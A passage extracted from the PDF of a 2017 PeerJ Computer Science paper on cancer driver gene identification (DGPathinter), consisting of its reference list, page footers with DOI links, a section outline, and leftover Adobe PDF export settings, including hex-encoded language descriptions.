genes across 21 tumor types. Nature 505(7484):495–501 DOI 10.1038/nature12912. Lawrence MS, Stojanov P, Polak P, Kryukov GV, Cibulskis K, Sivachenko A, Carter SL, Stewart C, Mermel CH, Roberts SA, Kiezun A, Hammerman PS, McKenna A, Drier Y, Zou L, Ramos AH, Pugh TJ, Stransky N, Helman E, Kim J, Sougnez C, Ambrogio L, Nickerson E, Shefler E, Cortés ML, Auclair D, Saksena G, Voet D, Noble M, DiCara D, Lin P, Lichtenstein L, Heiman DI, Fennell T, Imielinski M, Hernandez B, Hodis E, Baca S, Dulak AM, Lohr J, Landau DA, Wu CJ, Melendez-Zajgla J, Hidalgo-Miranda A, Koren A, McCarroll SA, Mora J, Crompton B, Onofrio R, Parkin M, Winckler W, Ardlie K, Gabriel SB, Roberts CWM, Biegel JA, Stegmaier K, Bass AJ, Garraway LA, Meyerson M, Golub TR, Gordenin DA, Sunyaev S, Lander ES, Getz G. 2013. Mutational heterogeneity in cancer and the search for new cancer-associated genes. Nature 499(7457):214–218 DOI 10.1038/nature12213. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 21/25 http://dx.doi.org/10.1038/nature09167 http://dx.doi.org/10.1371/journal.pcbi.1003460 http://dx.doi.org/10.1093/nar/gki072 http://dx.doi.org/10.1038/nature12634 http://dx.doi.org/10.1371/journal.pcbi.1002886 http://dx.doi.org/10.1093/bioinformatics/btv409 http://dx.doi.org/10.1038/nature12912 http://dx.doi.org/10.1038/nature12213 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ Lee I, Blom UM, Wang PI, Shim JE, Marcotte EM. 2011. Prioritizing candidate disease genes by network-based boosting of genome-wide association data. Genome Research 21(7):1109–1121 DOI 10.1101/gr.118992.110. Lee M, Shen H, Huang JZ, Marron JS. 2010. Biclustering via sparse singular value decomposition. Biometrics 66(4):1087–1095. Leiserson MD, Vandin F, Wu H-T, Dobson JR, Raphael BR. 2014. Pan-cancer identification of mutated pathways and protein complexes. Cancer Research 74(19 Supplement):5324–5324 DOI 10.1158/1538-7445.am2014-5324. Li F, Gao L, Ma X, Yang X. 2016. Detection of driver pathways using mutated gene network in cancer. Molecular BioSystems 12(7):2135–2141 DOI 10.1039/c6mb00084c. Ma W-Y, Zhang HJ. 1998. Benchmarking of image features for content-based retrieval. In Conference Record of the Thirty-Second Asilomar Conference on Signals, Systems & Computers, 1998, Pacific Grove, USA. Vol. 1. IEEE, 253–257. Ma X, Tang W, Wang P, Guo X, Gao L. 2016. Extracting stage-specific and dynamic modules through analyzing multiple networks associated with cancer progression. IEEE/ACM Transactions on Computational Biology and Bioinformatics. Piscataway & New York: IEEE/ACM. Malioutov D, Malyutov M. 2012. Boolean compressed sensing: LP relaxation for group testing. In 2012 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 3305–3308. Müller H, Müller W, Squire DM, Marchand-Maillet S, Pun T. 2001. Performance evaluation in content-based image retrieval: overview and proposals. Pattern Recognition Letters 22(5):593–601 DOI 10.1016/s0167-8655(00)00118-5. Ng S, Collisson EA, Sokolov A, Goldstein T, Gonzalez-Perez A, Lopez-Bigas N, Benz C, Haussler D, Stuart JM. 2012. PARADIGM-SHIFT predicts the function of mutations in multiple cancers using pathway impact analysis. Bioinformatics 28(18):i640–i646 DOI 10.1093/bioinformatics/bts402. Nishimura D. 2001. Biocarta. Biotech Software & Internet Report 2(3):117–120 DOI 10.1089/152791601750294344. Ogata H, Goto S, Sato K, Fujibuchi W, Bono H, Kanehisa M. 1999. KEGG: kyoto encyclopedia of genes and genomes. Nucleic Acids Research 27(1):29–34 DOI 10.1093/nar/27.1.29. Pan R, Zhou Y, Cao B, Liu NN, Lukose R, Scholz M, Yang Q. 2008. One-class collaborative filtering. In Eighth IEEE International Conference on Data Mining, 2008. ICDM’08, Pisa, Italy. IEEE, 502–511. Park S, Kim S-J, Yu D, Pena-Llopis S, Gao J, Park JS, Chen B, Norris J, Wang X, Chen M, Kim M, Yong J, WarDak Z, Choe KS, Story M, Starr TK, Cheong J-H, Hwang TH. 2015. An integrative somatic mutation analysis to identify pathways linked with survival outcomes across 19 cancer types. Bioinformatics 32(11):1643–1651 DOI 10.1093/bioinformatics/btv692. Parsons DW, Jones S, Zhang X, Lin JC-H, Leary RJ, Angenendt P, Mankoo P, Carter H, Siu I-M, Gallia GL. 2008. An integrated genomic analysis of human glioblastoma multiforme. Science 321(5897):1807–1812. Prasad TSK, Goel R, Kandasamy K, Keerthikumar S, Kumar S, Mathivanan S, Telikicherla D, Raju R, Shafreen B, Venugopal A, Balakrishnan L, Marimuthu A, Banerjee S, Somanathan DS, Sebastian A, Rani S, Ray S, Harrys Kishore CJ, Kanth S, Ahmed M, Kashyap MK, Mohmood R, Ramachandra YL, Krishna V, Abdul Rahiman B, Mohan S, Ranganathan P, Ramabadran S, Chaerkady R, Pandey A. 2009. Human protein reference database-2009 update. Nucleic Acids Research 37(suppl 1):D767–D772 DOI 10.1093/nar/gkn892. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 22/25 http://dx.doi.org/10.1101/gr.118992.110 http://dx.doi.org/10.1158/1538-7445.am2014-5324 http://dx.doi.org/10.1039/c6mb00084c http://dx.doi.org/10.1016/s0167-8655(00)00118-5 http://dx.doi.org/10.1093/bioinformatics/bts402 http://dx.doi.org/10.1089/152791601750294344 http://dx.doi.org/10.1093/nar/27.1.29 http://dx.doi.org/10.1093/bioinformatics/btv692 http://dx.doi.org/10.1093/nar/gkn892 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ Raphael BJ, Dobson JR, Oesper L, Vandin F. 2014. Identifying driver mutations in sequenced cancer genomes: computational approaches to enable precision medicine. Genome Medicine 6(1):5 DOI 10.1186/gm524. Razick S, Magklaras G, Donaldson IM. 2008. iRefIndex: a consolidated protein interaction database with provenance. BMC Bioinformatics 9(1):405 DOI 10.1186/1471-2105-9-405. Schuster SC. 2007. Next-generation sequencing transforms today’s biology. Nature 200(8):16–18 DOI 10.1038/nmeth1156. Sherr CJ, McCormick F. 2002. The RB and p53 pathways in cancer. Cancer Cell 2(2):103–112. Shi K, Gao L, Wang B. 2016. Discovering potential cancer driver genes by an integrated network-based approach. Molecular BioSystems 12(9):2921–2931 DOI 10.1039/c6mb00274a. Sill M, Kaiser S, Benner A, Kopp-Schneider A. 2011. Robust biclustering by sparse singular value decomposition incorporating stability selection. Bioinformatics 27(15):2089–2097. Sjöblom T, Jones S, Wood LD, Parsons DW, Lin J, Barber TD, Mandelker D, Leary RJ, Ptak J, Silliman N, Szabo S, Buckhaults P, Farrell C, Meeh P, Markowitz SD, Willis J, Dawson D, Willson JK, Gazdar AF, Hartigan J, Wu L, Liu C, Parmigiani G, Park BH, Bachman KE, Papadopoulos N, Vogelstein B, Kinzler KW, Velculescu VE. 2006. The consensus coding sequences of human breast and colorectal cancers. Science 314(5797):268–274. Subramanian A, Tamayo P, Mootha VK, Mukherjee S, Ebert BL, Gillette MA, Paulovich A, Pomeroy SL, Golub TR, Lander ES, Mesirov JP. 2005. Gene set enrichment analysis: a knowledge-based approach for interpreting genome-wide expression profiles. Proceedings of the National Academy of Sciences of the United States of America 102(43):15545–15550 DOI 10.1073/pnas.0506580102. Szklarczyk D, Franceschini A, Kuhn M, Simonovic M, Roth A, Minguez P, Doerks T, Stark M, Muller J, Bork P, Jensen LJ, von Mering C. 2011. The STRING database in 2011: functional interaction networks of proteins, globally integrated and scored. Nucleic Acids Research 39(suppl 1):D561–D568 DOI 10.1093/nar/gkq973. Tamborero D, Gonzalez-Perez A, Perez-Llamas C, Deu-Pons J, Kandoth C, Reimand J, Lawrence MS, Getz G, Bader GD, Ding L, Lopez-Bigas N. 2013. Comprehensive identification of mutational cancer driver genes across 12 tumor types. Scientific Reports 3:2650 DOI 10.1038/srep02650. Tu M, Li Z, Liu X, Lv N, Xi C, Lu Z, Wei J, Song G, Chen J, Guo F, Jiang K, Wang S, Gao W, Miao Y. 2017. Vasohibin 2 promotes epithelial-mesenchymal transition in human breast cancer via activation of transforming growth factor b 1 and hypoxia dependent repression of GATA-binding factor 3. Cancer Letters 388:187–197 DOI 10.1016/j.canlet.2016.11.016. Usary J, Llaca V, Karaca G, Presswala S, Karaca M, He X, Langerød A, Kåresen R, Oh DS, Dressler LG, Lønning PE, Strausberg RL, Chanock S, Børresen-Dale AL, Perou CM. 2004. Mutation of GATA3 in human breast tumors. Oncogene 23(46):7669 DOI 10.1038/sj.onc.1207966. Vandin F, Upfal E, Raphael BJ. 2011. Algorithms for detecting significantly mutated pathways in cancer. Journal of Computational Biology 18(3):507–522 DOI 10.1089/cmb.2010.0265. Vaske CJ, Benz SC, Sanborn JZ, Earl D, Szeto C, Zhu J, Haussler D, Stuart JM. 2010. Inference of patient-specific pathway activities from multi-dimensional cancer genomics data using PARADIGM. Bioinformatics 26(12):i237–i245 DOI 10.1093/bioinformatics/btq182. Vogelstein B, Papadopoulos N, Velculescu VE, Zhou S, Diaz LA, Kinzler KW. 2013. Cancer genome landscapes. Science 339(6127):1546–1558 DOI 10.1126/science.1235122. Weinstein JN, Collisson EA, Mills GB, Shaw KRM, Ozenberger BA, Ellrott K, Shmulevich I, Sander C, Stuart JM, Cancer Genome Atlas Research Network, Chang K, Creighton CJ, Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 23/25 http://dx.doi.org/10.1186/gm524 http://dx.doi.org/10.1186/1471-2105-9-405 http://dx.doi.org/10.1038/nmeth1156 http://dx.doi.org/10.1039/c6mb00274a http://dx.doi.org/10.1073/pnas.0506580102 http://dx.doi.org/10.1093/nar/gkq973 http://dx.doi.org/10.1038/srep02650 http://dx.doi.org/10.1016/j.canlet.2016.11.016 http://dx.doi.org/10.1038/sj.onc.1207966 http://dx.doi.org/10.1089/cmb.2010.0265 http://dx.doi.org/10.1093/bioinformatics/btq182 http://dx.doi.org/10.1126/science.1235122 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ Davis C, Donehower L, Drummond J, Wheeler D, Ally A, Balasundaram M, Birol I, Butterfield SN, Chu A, Chuah E, Chun HJ, Dhalla N, Guin R, Hirst M, Hirst C, Holt RA, Jones SJ, Lee D, Li HI, Marra MA, Mayo M, Moore RA, Mungall AJ, Robertson AG, Schein JE, Sipahimalani P, Tam A, Thiessen N, Varhol RJ, Beroukhim R, Bhatt AS, Brooks AN, Cherniack AD, Freeman SS, Gabriel SB, Helman E, Jung J, Meyerson M, Ojesina AI, Pedamallu CS, Saksena G, Schumacher SE, Tabak B, Zack T, Lander ES, Bristow CA, Hadjipanayis A, Haseley P, Kucherlapati R, Lee S, Lee E, Luquette LJ, Mahadeshwar HS, Pantazi A, Parfenov M, Park PJ, Protopopov A, Ren X, Santoso N, Seidman J, Seth S, Song X, Tang J, Xi R, Xu AW, Yang L, Zeng D, Auman JT, Balu S, Buda E, Fan C, Hoadley KA, Jones CD, Meng S, Mieczkowski PA, Parker JS, Perou CM, Roach J, Shi Y, Silva GO, Tan D, Veluvolu U, Waring S, Wilkerson MD, Wu J, Zhao W, Bodenheimer T, Hayes DN, Hoyle AP, Jeffreys SR, Mose LE, Simons JV, Soloway MG, Baylin SB, Berman BP, Bootwalla MS, Danilova L, Herman JG, Hinoue T, Laird PW, Rhie SK, Shen H, Triche T Jr, Weisenberger DJ, Carter SL, Cibulskis K, Chin L, Zhang J, Getz G, Sougnez C, Wang M, Saksena G, Carter SL, Cibulskis K, Chin L, Zhang J, Getz G, Dinh H, Doddapaneni HV, Gibbs R, Gunaratne P, Han Y, Kalra D, Kovar C, Lewis L, Morgan M, Morton D, Muzny D, Reid J, Xi L, Cho J, DiCara D, Frazer S, Gehlenborg N, Heiman DI, Kim J, Lawrence MS, Lin P, Liu Y, Noble MS, Stojanov P, Voet D, Zhang H, Zou L, Stewart C, Bernard B, Bressler R, Eakin A, Iype L, Knijnenburg T, Kramer R, Kreisberg R, Leinonen K, Lin J, Liu Y, Miller M, Reynolds SM, Rovira H, Shmulevich I, Thorsson V, Yang D, Zhang W, Amin S, Wu CJ, Wu CC, Akbani R, Aldape K, Baggerly KA, Broom B, Casasent TD, Cleland J, Creighton C, Dodda D, Edgerton M, Han L, Herbrich SM, Ju Z, Kim H, Lerner S, Li J, Liang H, Liu W, Lorenzi PL, Lu Y, Melott J, Mills GB, Nguyen L, Su X, Verhaak R, Wang W, Weinstein JN, Wong A, Yang Y, Yao J, Yao R, Yoshihara K, Yuan Y, Yung AK, Zhang N, Zheng S, Ryan M, Kane DW, Aksoy BA, Ciriello G, Dresdner G, Gao J, Gross B, Jacobsen A, Kahles A, Ladanyi M, Lee W, Lehmann KV, Miller ML, Ramirez R, Rätsch G, Reva B, Sander C, Schultz N, Senbabaoglu Y, Shen R, Sinha R, Sumer SO, Sun Y, Taylor BS, Weinhold N, Fei S, Spellman P, Benz C, Carlin D, Cline M, Craft B, Ellrott K, Goldman M, Haussler D, Ma S, Ng S, Paull E, Radenbaugh A, Salama S, Sokolov A, Stuart JM, Swatloski T, Uzunangelov V, Waltman P, Yau C, Zhu J, Hamilton SR, Getz G, Sougnez C, Abbott S, Abbott R, Dees ND, Delehaunty K, Ding L, Dooling DJ, Eldred JM, Fronick CC, Fulton R, Fulton LL, Kalicki-Veizer J, Kanchi KL, Kandoth C, Koboldt DC, Larson DE, Ley TJ, Lin L, Lu C, Magrini VJ, Mardis ER, McLellan MD, McMichael JF, Miller CA, O’Laughlin M, Pohl C, Schmidt H, Smith SM, Walker J, Wallis JW, Wendl MC, Wilson RK, Wylie T, Zhang Q, Burton R, Jensen MA, Kahn A, Pihl T, Pot D, Wan Y, Levine DA, Black AD, Bowen J, Frick J, Gastier-Foster JM, Harper HA, Helsel C, Leraas KM, Lichtenberg TM, McAllister C, Ramirez NC, Sharpe S, Wise L, Zmuda E, Chanock SJ, Davidsen T, Demchok JA, Eley G, Felau I, Ozenberger BA, Sheth M, Sofia H, Staudt L, Tarnuzzer R, Wang Z, Yang L, Zhang J, Omberg L, Margolin A, Raphael BJ, Vandin F, Wu HT, Leiserson MD, Benz SC, Vaske CJ, Noushmehr H, Knijnenburg T, Wolf D, Van’t Veer L, Collisson EA, Anastassiou D, Ou Yang TH, Lopez-Bigas N, Gonzalez-Perez A, Tamborero D, Xia Z, Li W, Cho DY, Przytycka T, Hamilton M, McGuire S, Nelander S, Johansson P, Jörnsten R, Kling T, Sanchez J. 2013. The cancer genome atlas pan- cancer analysis project. Nature Genetics 45(10):1113–1120 DOI 10.1038/ng.2764. Wu H-T, Hajirasouliha I, Raphael BJ. 2014. Detecting independent and recurrent copy number aberrations using interval graphs. Bioinformatics 30(12):i195–i203 DOI 10.1093/bioinformatics/btu276. Xi J, Li A. 2016. Discovering recurrent copy number aberrations in complex patterns via non- negative sparse singular value decomposition. IEEE/ACM Transactions on Computational Biology and Bioinformatics 13(4):656–668 DOI 10.1109/tcbb.2015.2474404. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 24/25 http://dx.doi.org/10.1038/ng.2764 http://dx.doi.org/10.1093/bioinformatics/btu276 http://dx.doi.org/10.1109/tcbb.2015.2474404 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ Xi J, Li A, Wang M. 2017. A novel network regularized matrix decomposition method to detect mutated cancer genes in tumour samples with inter-patient heterogeneity. Scientific Reports 7(1):2855 DOI 10.1038/s41598-017-03141-w. Xie B, Wang M, Tao D. 2011. Toward the optimization of normalized graph Laplacian. IEEE Transactions on Neural Networks 22(4):660–666 DOI 10.1109/tnn.2011.2107919. Xiong M, Zhao Z, Arnold J, Yu F. 2011. Next-generation sequencing. Journal of Biomedicine and Biotechnology 2010:370710 DOI 10.1155/2010/370710. Yang H, Wei Q, Zhong X, Yang H, Li B. 2017. Cancer driver gene discovery through an integrative genomics approach in a non-parametric Bayesian framework. Bioinformatics 33(4):483–490. Youn A, Simon R. 2011. Identifying cancer driver genes in tumor genome sequencing studies. Bioinformatics 27(2):175–181 DOI 10.1093/bioinformatics/btq630. Zhao M, Wang Q, Wang Q, Jia P, Zhao Z. 2013. Computational tools for copy number variation (CNV) detection using next-generation sequencing data: features and perspectives. BMC Bioinformatics 14(11):1 DOI 10.1186/1471-2105-14-s11-s1. Zhou X, Liu J, Wan X, Yu W. 2014. Piecewise-constant and low-rank approximation for identification of recurrent copy number variations. Bioinformatics 30(14):1943–1949 DOI 10.1093/bioinformatics/btu131. Zhou X, Yang C, Wan X, Zhao H, Yu W. 2013. Multisample aCGH data analysis via total variation and spectral regularization. IEEE/ACM Transactions on Computational Biology and Bioinformatics 10(1):230–235 DOI 10.1109/tcbb.2012.166. Xi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.133 25/25 http://dx.doi.org/10.1038/s41598-017-03141-w http://dx.doi.org/10.1109/tnn.2011.2107919 http://dx.doi.org/10.1155/2010/370710 http://dx.doi.org/10.1093/bioinformatics/btq630 http://dx.doi.org/10.1186/1471-2105-14-s11-s1 http://dx.doi.org/10.1093/bioinformatics/btu131 http://dx.doi.org/10.1109/tcbb.2012.166 http://dx.doi.org/10.7717/peerj-cs.133 https://peerj.com/computer-science/ DGPathinter: a novel model for identifying driver genes via knowledge-driven matrix factorization with prior knowledge from interactome and pathways ... Introduction Materials and Methods Results Discussion flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << 